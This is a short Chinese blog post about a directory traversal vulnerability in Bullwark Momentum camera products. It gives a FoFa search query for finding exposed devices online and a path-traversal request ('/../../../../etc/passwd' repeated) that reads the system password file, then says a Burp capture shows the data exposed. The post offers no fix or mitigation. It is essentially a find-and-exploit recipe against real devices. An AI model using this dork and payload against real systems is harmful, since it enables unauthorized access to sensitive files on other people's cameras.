Bullwark Momentum 目录遍历漏洞

Bullwark Momentum中存在一款摄像头产产品  
输入某个特定地址:即可暴露出敏感信息
参考:
 
 
FoFa搜索:app="Bullwark Momentum"
即可找到多款产品
 

 

 

输入特定路径:

/../../../../../../../../../../../../../etc/passwd

即可暴露信息   以下为Burp抓包

 

 

 

已经暴露信息。

 

End!!!

posted @ 2022-05-19 14:53  我就去睡觉  阅读(151)  评论(0编辑  收藏  举报